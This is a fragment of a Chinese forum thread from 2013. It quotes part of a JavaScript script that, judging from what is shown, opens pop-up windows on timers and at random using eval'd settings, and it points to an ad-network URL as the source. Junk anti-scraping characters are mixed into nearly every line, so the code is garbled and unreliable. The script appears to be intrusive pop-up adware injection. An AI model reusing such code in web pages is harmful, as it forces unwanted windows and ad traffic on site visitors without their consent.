: m' h% W' g1 q - b: 2
& |. M3 P8 T1 P" J5 [ - }) . k* y5 h6 M/ O1 {1 Q4 q( m4 i9 M; d
- },
+ A6 A2 V O! {4 ^7 s- K' X. ] - 300)
. N7 W4 d' p" i6 R/ W( z - }
1 J* N+ b3 I# `* X- B* _ - for (var i = 1; i <= 10; i++) { 0 h- T( \( ?6 U) t2 M6 s' s
- var n = i == 1 ? "": i; & G9 }% s) ?8 {7 H! E
- if (eval("_pt" + n + "b") > Math.random()) { ' D* Y$ L, ]: m7 h5 ?
- setTimeout(function() { / j* Z, @$ N) W4 M- o
- setTimeout(function() { 2 I3 \1 j/ S; J) h3 [% n
- pop(url, {
4 |" N4 R* Y& d p6 ]( V4 Q9 n - a: 1,
; r0 D( c$ b$ K8 P - b: 2 5 b8 O4 N. P$ y/ m8 ?/ Y
- })
* O: W3 [& Y/ i& M7 R4 | - },
$ A* q, s# U/ M* m$ E* _4 B( \0 b - 300) * t' ?& T% q0 G: ]- ?$ l. U
- }, 1 Y+ b' A. m1 t
- parseInt(eval("_pt" + n + "a")) * 1000) . X9 D1 Z9 t; w4 f- S4 g. M5 ?3 F
- }
- d. E& ?. [5 d# K( k R - } ' e$ t+ A7 w* c: r6 q& ]& G1 |
- if (_pc2 > Math.random()) {
! {6 H4 B1 m7 W! ^, [ - a_pop(url) 4 H8 U( A3 l6 M! r* m
- } ) c+ B1 G( I9 \5 x ~! j
- if (_po > Math.random()) { ; l& S; L- t( N% p1 `
- try { + e/ S9 K% _6 V5 C- c' ~* l! h8 ^
- func(url)
; u( x/ o# `1 E7 B' k8 O - } catch(q) {} 9 ]6 D$ x1 @! G) O! y- B- w+ \. Y
- } 9 i8 m' ^9 ^/ v; M, d( C
- }
, f$ I: y6 w v8 y - };
% v$ c2 z0 D$ Y6 N h' U - fstart(aa_url);
8 x: P K9 C B' I1 ]- j - event(window, 'beforeunload', % Z q3 b( b+ z. V6 G1 ~! Z. O+ G
- function() {}) + O" c! T/ _+ a6 [6 p+ W5 z
- })();
; x5 Z/ F- n0 K8 E& [URL从这里产生& I1 S0 H& p9 \( h8 @
/ S3 k, i5 g. _; V& F/ o
http://play.unionsky.cn/show/?placeid=141830- Z9 R5 A% \* I3 Z) u2 G
8 W. I' w6 G9 b9 c# e. Q, |/ y' T# Q! b% w9 o8 }
|
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
